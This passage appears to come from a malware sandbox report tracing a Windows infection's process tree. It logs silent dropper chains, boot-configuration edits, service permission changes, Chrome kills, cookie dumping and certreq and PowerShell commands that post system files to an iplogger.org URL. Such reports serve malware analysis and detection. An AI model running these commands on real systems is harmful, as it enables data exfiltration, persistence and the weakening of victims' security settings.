C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy
12⤵
- Modifies boot configuration data using bcdedit
PID:5236

C:\Windows\System32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
11⤵
- Modifies boot configuration data using bcdedit
PID:1752

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
11⤵
- Drops file in Drivers directory
PID:4684

C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
11⤵
PID:7100

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
12⤵
PID:6924

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
13⤵
PID:6056

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
13⤵
PID:4340

C:\Users\Admin\AppData\Local\Temp\csrss\ww31.exe
C:\Users\Admin\AppData\Local\Temp\csrss\ww31.exe
11⤵
PID:8392

C:\Users\Admin\AppData\Local\Temp\dw5e24kkafz\IBInstaller_97039.exe
"C:\Users\Admin\AppData\Local\Temp\dw5e24kkafz\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5028

C:\Users\Admin\AppData\Local\Temp\is-2J2M7.tmp\IBInstaller_97039.tmp
"C:\Users\Admin\AppData\Local\Temp\is-2J2M7.tmp\IBInstaller_97039.tmp" /SL5="$1030E,14452223,721408,C:\Users\Admin\AppData\Local\Temp\dw5e24kkafz\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4384

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://gemstrue.shop/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
10⤵
- Checks computer location settings
PID:4972

C:\Users\Admin\AppData\Local\Temp\is-D6E2B.tmp\{app}\chrome_proxy.exe
"C:\Users\Admin\AppData\Local\Temp\is-D6E2B.tmp\{app}\chrome_proxy.exe"
10⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4516

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-D6E2B.tmp\{app}\chrome_proxy.exe"
11⤵
PID:6648

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 4
12⤵
- Runs ping.exe
PID:7028

C:\Users\Admin\AppData\Local\Temp\thtn4jjd4t1\vpn.exe
"C:\Users\Admin\AppData\Local\Temp\thtn4jjd4t1\vpn.exe" /silent /subid=482
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4020

C:\Users\Admin\AppData\Local\Temp\is-DQPLR.tmp\vpn.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DQPLR.tmp\vpn.tmp" /SL5="$10310,15170975,270336,C:\Users\Admin\AppData\Local\Temp\thtn4jjd4t1\vpn.exe" /silent /subid=482
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4400

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
10⤵
PID:4800

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
11⤵
PID:5800

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
10⤵
PID:6124

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
11⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:4136

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
10⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:6476

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
10⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:5716

C:\Users\Admin\AppData\Local\Temp\xftrqentlri\tilwiw1t4uk.exe
"C:\Users\Admin\AppData\Local\Temp\xftrqentlri\tilwiw1t4uk.exe" /ustwo INSTALL
8⤵
- Executes dropped EXE
PID:2924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 652
9⤵
- Drops file in Windows directory
- Program crash
PID:4124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 692
9⤵
- Program crash
PID:3600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 728
9⤵
- Program crash
PID:5348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 748
9⤵
- Program crash
PID:5540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 872
9⤵
- Program crash
PID:5844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 920
9⤵
- Program crash
PID:4732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 1140
9⤵
- Program crash
PID:5572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 1152
9⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:4260

C:\Users\Admin\AppData\Local\Temp\3qzc5wimsk1\5n1yv4w4vuz.exe
"C:\Users\Admin\AppData\Local\Temp\3qzc5wimsk1\5n1yv4w4vuz.exe" 57a764d042bf8
8⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4992

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k "C:\Program Files\21XR7QONMO\21XR7QONM.exe" 57a764d042bf8 & exit
9⤵
PID:5048

C:\Program Files\21XR7QONMO\21XR7QONM.exe
"C:\Program Files\21XR7QONMO\21XR7QONM.exe" 57a764d042bf8
10⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
PID:5652

C:\Users\Admin\AppData\Local\Temp\nc4j5fr1lb4\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\nc4j5fr1lb4\Setup3310.exe" /Verysilent /subid=577
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4996

C:\Users\Admin\AppData\Local\Temp\rvwnxvxgh2f\rdvpazav4on.exe
"C:\Users\Admin\AppData\Local\Temp\rvwnxvxgh2f\rdvpazav4on.exe" testparams
8⤵
- Executes dropped EXE
PID:4980

C:\Users\Admin\AppData\Roaming\pbjmu13k454\0bnkzgsvvq4.exe
"C:\Users\Admin\AppData\Roaming\pbjmu13k454\0bnkzgsvvq4.exe" /VERYSILENT /p=testparams
9⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5200

C:\Users\Admin\AppData\Local\Temp\is-ACMDG.tmp\0bnkzgsvvq4.tmp
"C:\Users\Admin\AppData\Local\Temp\is-ACMDG.tmp\0bnkzgsvvq4.tmp" /SL5="$2030A,404973,58368,C:\Users\Admin\AppData\Roaming\pbjmu13k454\0bnkzgsvvq4.exe" /VERYSILENT /p=testparams
10⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:5268

C:\Users\Admin\AppData\Local\Temp\hkkckggdkqr\chashepro3.exe
"C:\Users\Admin\AppData\Local\Temp\hkkckggdkqr\chashepro3.exe" /VERYSILENT
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4968

C:\Users\Admin\AppData\Local\Temp\0gkx5a53grt\safebits.exe
"C:\Users\Admin\AppData\Local\Temp\0gkx5a53grt\safebits.exe" /S /pubid=1 /subid=451
8⤵
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:188

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\DragonFruitSoftware\tmorgm.dll",tmorgm C:\Users\Admin\AppData\Local\Temp\0gkx5a53grt\safebits.exe
9⤵
- Blocklisted process makes network request
PID:1380

C:\Users\Admin\AppData\Local\Temp\khbijonctqi\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\khbijonctqi\askinstall24.exe"
8⤵
- Suspicious use of SetWindowsHookEx
PID:6452

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
9⤵
PID:5472

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
10⤵
- Kills process with taskkill
PID:4048

C:\Users\Admin\AppData\Local\Temp\ypzgjxvh5dm\vict.exe
"C:\Users\Admin\AppData\Local\Temp\ypzgjxvh5dm\vict.exe" /VERYSILENT /id=535
8⤵
- Suspicious use of SetWindowsHookEx
PID:4280

C:\Users\Admin\AppData\Local\Temp\is-IE31T.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-IE31T.tmp\vict.tmp" /SL5="$40286,870426,780800,C:\Users\Admin\AppData\Local\Temp\ypzgjxvh5dm\vict.exe" /VERYSILENT /id=535
9⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:5220

C:\Users\Admin\AppData\Local\Temp\is-HMQOO.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-HMQOO.tmp\wimapi.exe" 535
10⤵
PID:4036

C:\Users\Admin\AppData\Local\Temp\ubt2pebw0ia\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\ubt2pebw0ia\Setup3310.exe" /Verysilent /subid=577
8⤵
- Suspicious use of SetWindowsHookEx
PID:4588

C:\Users\Admin\AppData\Local\Temp\is-C2PPG.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-C2PPG.tmp\Setup3310.tmp" /SL5="$302EE,802346,56832,C:\Users\Admin\AppData\Local\Temp\ubt2pebw0ia\Setup3310.exe" /Verysilent /subid=577
9⤵
- Loads dropped DLL
PID:4196

C:\Users\Admin\AppData\Local\Temp\is-LEEBT.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-LEEBT.tmp\Setup.exe" /Verysilent
10⤵
PID:7104

C:\Users\Admin\AppData\Local\Temp\is-3SUOF.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-3SUOF.tmp\Setup.tmp" /SL5="$A04A8,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-LEEBT.tmp\Setup.exe" /Verysilent
11⤵
- Drops file in Windows directory
PID:6008

C:\Users\Admin\AppData\Local\Temp\is-36S0F.tmp\PictureLAb.exe
"C:\Users\Admin\AppData\Local\Temp\is-36S0F.tmp\PictureLAb.exe" /Verysilent
12⤵
PID:6372

C:\Users\Admin\AppData\Local\Temp\is-FSA5R.tmp\PictureLAb.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FSA5R.tmp\PictureLAb.tmp" /SL5="$303A2,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-36S0F.tmp\PictureLAb.exe" /Verysilent
13⤵
PID:1752

C:\Users\Admin\AppData\Local\Temp\is-Q3QOE.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-Q3QOE.tmp\Setup.exe" /VERYSILENT
14⤵
PID:5964

C:\Users\Admin\AppData\Local\Temp\is-HBFML.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-HBFML.tmp\Setup.tmp" /SL5="$8035C,442598,358912,C:\Users\Admin\AppData\Local\Temp\is-Q3QOE.tmp\Setup.exe" /VERYSILENT
15⤵
PID:4324

C:\Users\Admin\AppData\Local\Temp\is-9TCCS.tmp\kkkk.exe
"C:\Users\Admin\AppData\Local\Temp\is-9TCCS.tmp\kkkk.exe" /S /UID=lab214
16⤵
- Drops file in Drivers directory
PID:6088

C:\Users\Admin\AppData\Local\Temp\35-ab439-f00-77f89-f77c0ce40ebdd\Wonivukaeky.exe
"C:\Users\Admin\AppData\Local\Temp\35-ab439-f00-77f89-f77c0ce40ebdd\Wonivukaeky.exe"
17⤵
PID:7132

C:\Users\Admin\AppData\Local\Temp\is-36S0F.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-36S0F.tmp\Delta.exe" /Verysilent
12⤵
PID:4480

C:\Users\Admin\AppData\Local\Temp\is-LPROG.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-LPROG.tmp\Delta.tmp" /SL5="$403A2,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-36S0F.tmp\Delta.exe" /Verysilent
13⤵
PID:6916

C:\Users\Admin\AppData\Local\Temp\is-2CFRL.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-2CFRL.tmp\Setup.exe" /VERYSILENT
14⤵
PID:5620

C:\Users\Admin\AppData\Local\Temp\is-36S0F.tmp\zznote.exe
"C:\Users\Admin\AppData\Local\Temp\is-36S0F.tmp\zznote.exe" /Verysilent
12⤵
PID:428

C:\Users\Admin\AppData\Local\Temp\is-CKNUJ.tmp\zznote.tmp
"C:\Users\Admin\AppData\Local\Temp\is-CKNUJ.tmp\zznote.tmp" /SL5="$503A2,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-36S0F.tmp\zznote.exe" /Verysilent
13⤵
PID:6300

C:\Users\Admin\AppData\Local\Temp\is-RKDAC.tmp\jg4_4jaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-RKDAC.tmp\jg4_4jaa.exe" /silent
14⤵
- Checks whether UAC is enabled
PID:3992

C:\Users\Admin\AppData\Local\Temp\is-36S0F.tmp\hjjgaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-36S0F.tmp\hjjgaa.exe" /Verysilent
12⤵
PID:6812

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
13⤵
PID:6448

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
13⤵
PID:5512

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
13⤵
PID:8032

C:\Users\Admin\AppData\Local\Temp\znevmzx4azr\chashepro3.exe
"C:\Users\Admin\AppData\Local\Temp\znevmzx4azr\chashepro3.exe" /VERYSILENT
8⤵
PID:6740

C:\Users\Admin\AppData\Local\Temp\is-SEVDO.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-SEVDO.tmp\chashepro3.tmp" /SL5="$3039E,1446038,58368,C:\Users\Admin\AppData\Local\Temp\znevmzx4azr\chashepro3.exe" /VERYSILENT
9⤵
- Drops file in Program Files directory
PID:6972

C:\Program Files (x86)\JCleaner\whiterauf.exe
"C:\Program Files (x86)\JCleaner\whiterauf.exe"
10⤵
- Suspicious use of SetThreadContext
PID:3324

C:\Program Files (x86)\JCleaner\whiterauf.exe
"{path}"
11⤵
PID:5576

C:\Program Files (x86)\JCleaner\Venita.exe
"C:\Program Files (x86)\JCleaner\Venita.exe"
10⤵
- Suspicious use of SetThreadContext
PID:6156

C:\Program Files (x86)\JCleaner\Venita.exe
"{path}"
11⤵
PID:2548

C:\Program Files (x86)\JCleaner\Abbas.exe
"C:\Program Files (x86)\JCleaner\Abbas.exe"
10⤵
PID:4424

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"
10⤵
- Blocklisted process makes network request
- Drops file in System32 directory
PID:6588

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1aSny7"
10⤵
- Checks computer location settings
PID:5604

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
10⤵
PID:6852

C:\Windows\SysWOW64\certreq.exe
certreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
11⤵
PID:5584

C:\Program Files (x86)\JCleaner\5.exe
"C:\Program Files (x86)\JCleaner\5.exe"
10⤵
PID:5072

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Program Files (x86)\JCleaner\5.exe"
11⤵
PID:2464

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
12⤵
- Delays execution with timeout.exe
PID:6756

C:\Users\Admin\AppData\Local\Temp\m1wtlkmwg4m\ernvuq3fcif.exe
"C:\Users\Admin\AppData\Local\Temp\m1wtlkmwg4m\ernvuq3fcif.exe" /ustwo INSTALL
8⤵
PID:1764

C:\Users\Admin\AppData\Local\Temp\srafyuqzbu4\safebits.exe
"C:\Users\Admin\AppData\Local\Temp\srafyuqzbu4\safebits.exe" /S /pubid=1 /subid=451
8⤵
PID:4408

C:\Users\Admin\AppData\Local\Temp\nocp1ffk4nj\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\nocp1ffk4nj\askinstall24.exe"
8⤵
PID:1864

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
9⤵
PID:6804

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
10⤵
- Kills process with taskkill
PID:984

C:\Users\Admin\AppData\Local\Temp\hspqf21q43r\vict.exe
"C:\Users\Admin\AppData\Local\Temp\hspqf21q43r\vict.exe" /VERYSILENT /id=535
8⤵
PID:6296

C:\Users\Admin\AppData\Local\Temp\is-6QCA7.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-6QCA7.tmp\vict.tmp" /SL5="$504B2,870426,780800,C:\Users\Admin\AppData\Local\Temp\hspqf21q43r\vict.exe" /VERYSILENT /id=535
9⤵
- Drops file in Program Files directory
PID:4812

C:\Users\Admin\AppData\Local\Temp\is-FPIQC.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-FPIQC.tmp\wimapi.exe" 535
10⤵
PID:4804

C:\Users\Admin\AppData\Local\Temp\32airgszivq\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\32airgszivq\Setup3310.exe" /Verysilent /subid=577
8⤵
PID:5184

C:\Users\Admin\AppData\Local\Temp\is-2LS5R.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-2LS5R.tmp\Setup3310.tmp" /SL5="$90502,802346,56832,C:\Users\Admin\AppData\Local\Temp\32airgszivq\Setup3310.exe" /Verysilent /subid=577
9⤵
PID:6632

C:\Users\Admin\AppData\Local\Temp\is-OOD3F.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-OOD3F.tmp\Setup.exe" /Verysilent
10⤵
PID:4976

C:\Users\Admin\AppData\Local\Temp\is-5687K.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5687K.tmp\Setup.tmp" /SL5="$70456,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-OOD3F.tmp\Setup.exe" /Verysilent
11⤵
- Drops file in Windows directory
PID:4604

C:\Users\Admin\AppData\Local\Temp\is-QNO53.tmp\PictureLAb.exe
"C:\Users\Admin\AppData\Local\Temp\is-QNO53.tmp\PictureLAb.exe" /Verysilent
12⤵
PID:7392

C:\Users\Admin\AppData\Local\Temp\is-V5U8B.tmp\PictureLAb.tmp
"C:\Users\Admin\AppData\Local\Temp\is-V5U8B.tmp\PictureLAb.tmp" /SL5="$306B2,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-QNO53.tmp\PictureLAb.exe" /Verysilent
13⤵
PID:7408

C:\Users\Admin\AppData\Local\Temp\is-DKIK0.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-DKIK0.tmp\Setup.exe" /VERYSILENT
14⤵
PID:7584

C:\Users\Admin\AppData\Local\Temp\is-C8D3U.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-C8D3U.tmp\Setup.tmp" /SL5="$2071A,442598,358912,C:\Users\Admin\AppData\Local\Temp\is-DKIK0.tmp\Setup.exe" /VERYSILENT
15⤵
PID:7600

C:\Users\Admin\AppData\Local\Temp\is-0D011.tmp\kkkk.exe
"C:\Users\Admin\AppData\Local\Temp\is-0D011.tmp\kkkk.exe" /S /UID=lab214
16⤵
- Drops file in Drivers directory
PID:7652

C:\Users\Admin\AppData\Local\Temp\b5-11cc5-d4a-406b0-6605d5f9659d4\Kokykanaedu.exe
"C:\Users\Admin\AppData\Local\Temp\b5-11cc5-d4a-406b0-6605d5f9659d4\Kokykanaedu.exe"
17⤵
PID:7748

C:\Users\Admin\AppData\Local\Temp\is-QNO53.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-QNO53.tmp\Delta.exe" /Verysilent
12⤵
PID:7892

C:\Users\Admin\AppData\Local\Temp\is-8V7T1.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8V7T1.tmp\Delta.tmp" /SL5="$406B2,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-QNO53.tmp\Delta.exe" /Verysilent
13⤵
PID:7912

C:\Users\Admin\AppData\Local\Temp\is-F3SUL.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-F3SUL.tmp\Setup.exe" /VERYSILENT
14⤵
PID:8084

C:\Users\Admin\AppData\Local\Temp\is-QNO53.tmp\zznote.exe
"C:\Users\Admin\AppData\Local\Temp\is-QNO53.tmp\zznote.exe" /Verysilent
12⤵
PID:8108

C:\Users\Admin\AppData\Local\Temp\is-7CQDB.tmp\zznote.tmp
"C:\Users\Admin\AppData\Local\Temp\is-7CQDB.tmp\zznote.tmp" /SL5="$506B2,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-QNO53.tmp\zznote.exe" /Verysilent
13⤵
PID:8132

C:\Users\Admin\AppData\Local\Temp\is-T2IIR.tmp\jg4_4jaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-T2IIR.tmp\jg4_4jaa.exe" /silent
14⤵
- Checks whether UAC is enabled
PID:7280

C:\Users\Admin\AppData\Local\Temp\is-QNO53.tmp\hjjgaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-QNO53.tmp\hjjgaa.exe" /Verysilent
12⤵
PID:7372

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
13⤵
PID:7448

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
13⤵
PID:7888

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
13⤵
PID:5248

C:\Users\Admin\AppData\Local\Temp\bns3pzkjcnc\z1miezvz1ye.exe
"C:\Users\Admin\AppData\Local\Temp\bns3pzkjcnc\z1miezvz1ye.exe" /ustwo INSTALL
8⤵
PID:3884

C:\Users\Admin\AppData\Local\Temp\ahxo5g2kwpp\chashepro3.exe
"C:\Users\Admin\AppData\Local\Temp\ahxo5g2kwpp\chashepro3.exe" /VERYSILENT
8⤵
PID:1580

C:\Users\Admin\AppData\Local\Temp\is-1GM5N.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-1GM5N.tmp\chashepro3.tmp" /SL5="$1063E,1446038,58368,C:\Users\Admin\AppData\Local\Temp\ahxo5g2kwpp\chashepro3.exe" /VERYSILENT
9⤵
- Drops file in Program Files directory
PID:4192

C:\Program Files (x86)\JCleaner\whiterauf.exe
"C:\Program Files (x86)\JCleaner\whiterauf.exe"
10⤵
- Suspicious use of SetThreadContext
PID:4808

C:\Program Files (x86)\JCleaner\whiterauf.exe
"{path}"
11⤵
PID:7440

C:\Program Files (x86)\JCleaner\whiterauf.exe
"{path}"
11⤵
PID:7456

C:\Program Files (x86)\JCleaner\Venita.exe
"C:\Program Files (x86)\JCleaner\Venita.exe"
10⤵
- Suspicious use of SetThreadContext
PID:6436

C:\Program Files (x86)\JCleaner\Venita.exe
"{path}"
11⤵
PID:4632

C:\Program Files (x86)\JCleaner\Venita.exe
"{path}"
11⤵
PID:7268

C:\Program Files (x86)\JCleaner\Abbas.exe
"C:\Program Files (x86)\JCleaner\Abbas.exe"
10⤵
PID:6604

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"
10⤵
- Blocklisted process makes network request
- Drops file in System32 directory
PID:5536

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1aSny7"
10⤵
- Checks computer location settings
PID:1368

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
10⤵
PID:6652

C:\Windows\SysWOW64\certreq.exe
certreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
11⤵
PID:4216

C:\Program Files (x86)\JCleaner\5.exe
"C:\Program Files (x86)\JCleaner\5.exe"
10⤵
PID:4116

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Program Files (x86)\JCleaner\5.exe"
11⤵
PID:7332

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
12⤵
- Delays execution with timeout.exe
PID:7368

C:\Users\Admin\AppData\Local\Temp\tdjpdizlwdz\safebits.exe
"C:\Users\Admin\AppData\Local\Temp\tdjpdizlwdz\safebits.exe" /S /pubid=1 /subid=451
8⤵
PID:7264

C:\Users\Admin\AppData\Local\Temp\cegsk0gdtuv\vict.exe
"C:\Users\Admin\AppData\Local\Temp\cegsk0gdtuv\vict.exe" /VERYSILENT /id=535
8⤵
PID:7424

C:\Users\Admin\AppData\Local\Temp\is-G90RF.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-G90RF.tmp\vict.tmp" /SL5="$405F0,870426,780800,C:\Users\Admin\AppData\Local\Temp\cegsk0gdtuv\vict.exe" /VERYSILENT /id=535
9⤵
PID:8100

C:\Users\Admin\AppData\Local\Temp\is-0BD53.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-0BD53.tmp\wimapi.exe" 535
10⤵
PID:8120

C:\Users\Admin\AppData\Local\Temp\d25oi4xt4es\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\d25oi4xt4es\askinstall24.exe"
8⤵
PID:7948

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
9⤵
PID:4308

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
10⤵
- Kills process with taskkill
PID:7328

C:\Users\Admin\AppData\Local\Temp\rodtsb03ft1\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\rodtsb03ft1\Setup3310.exe" /Verysilent /subid=577
8⤵
PID:8060

C:\Users\Admin\AppData\Local\Temp\is-DVBV9.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DVBV9.tmp\Setup3310.tmp" /SL5="$305EC,802346,56832,C:\Users\Admin\AppData\Local\Temp\rodtsb03ft1\Setup3310.exe" /Verysilent /subid=577
9⤵
PID:7004

C:\Users\Admin\AppData\Local\Temp\is-S35AS.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-S35AS.tmp\Setup.exe" /Verysilent
10⤵
PID:8068

C:\Users\Admin\AppData\Local\Temp\is-5K2EG.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5K2EG.tmp\Setup.tmp" /SL5="$50632,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-S35AS.tmp\Setup.exe" /Verysilent
